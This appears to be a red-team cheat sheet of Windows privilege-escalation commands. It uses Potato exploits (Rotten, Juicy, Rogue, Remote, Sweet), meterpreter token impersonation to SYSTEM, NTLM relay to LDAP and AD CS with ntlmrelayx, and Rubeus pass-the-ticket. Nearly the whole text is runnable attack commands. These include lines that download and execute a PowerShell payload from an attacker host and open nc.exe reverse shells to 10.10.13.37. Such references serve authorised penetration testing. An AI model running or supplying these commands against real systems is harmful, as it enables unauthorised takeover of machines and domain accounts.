$ curl -L https://github.com/foxglovesec/RottenPotato/raw/master/rottenpotato.exe > r.exe
meterpreter > upload r.exe
meterpreter > load incognito
meterpreter > execute -cH -f r.exe
meterpreter > list_tokens -u
meterpreter > impersonate_token "NT AUTHORITY\\SYSTEM"
$ curl -L https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe > j.exe
Using a PowerShell reverse shell:
$ curl -L https://github.com/samratashok/nishang/raw/master/Shells/Invoke-PowerShellTcpOneLine.ps1 > rev.ps1
Cmd > certutil -urlcache -split -f http://10.10.13.37/j.exe C:\Windows\System32\spool\drivers\color\j.exe
Cmd > echo cmd /c powershell -exec bypass -nop -c "IEX(New-Object Net.WebClient).DownloadString('http://10.10.13.37/rev.ps1')" > rev.bat
Cmd > .\j.exe -t * -c {8BC3F05E-D86B-11D0-A075-00C04FB68820} -l 1337 -p C:\Windows\System32\spool\drivers\color\rev.bat
Using nc.exe:
Cmd > .\j.exe -t * -c {8BC3F05E-D86B-11D0-A075-00C04FB68820} -l 1337 -p C:\Windows\System32\spool\drivers\color\nc.exe "10.10.13.37 1337 -e cmd"
$ sudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP:192.168.1.11:9999
Trigger the potato to run a binary with high privileges (if the payload is a reverse shell, start the listener before triggering):
Cmd > .\RoguePotato.exe -r 10.10.13.37 -e "C:\windows\Temp\nc.exe 10.10.13.37 443 -e cmd" -l 9999
Cmd > query user
Cmd > quser
$ sudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP:192.168.1.11:9998
Cmd > .\RemotePotato0.exe -m 2 -x 10.10.13.37 -p 9998 -s 5
$ sudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP:192.168.1.11:9998
$ ntlmrelayx.py -t ldap://192.168.1.11 --escalate-user snovvcrash --no-smb-server --no-wcf-server --no-raw-server
Cmd > .\RemotePotato0.exe -m 0 -r 10.10.13.37 -x 10.10.13.37 -p 9998 -s 5
$ ntlmrelayx.py -t http://CA01.megacorp.local/certsrv/certfnsh.asp --adcs --template User --no-smb-server --no-wcf-server --no-raw-server
Cmd > .\RemotePotato0.exe -m 0 -r 10.10.13.37 -x 10.10.13.37 -p 9998 -s 5 -c "{f8842f8e-dafe-4b37-9d38-4e0714a61149}"
Cmd > .\Rubeus.exe asktgt /user:snovvcrash /domain:megacorp.local /dc:DC1.megacorp.local /certificate:<BASE64_PFX_CERT> /ptt
Cmd > .\SweetPotato.exe -p C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -a "-w hidden -enc <BASE64_CMD>"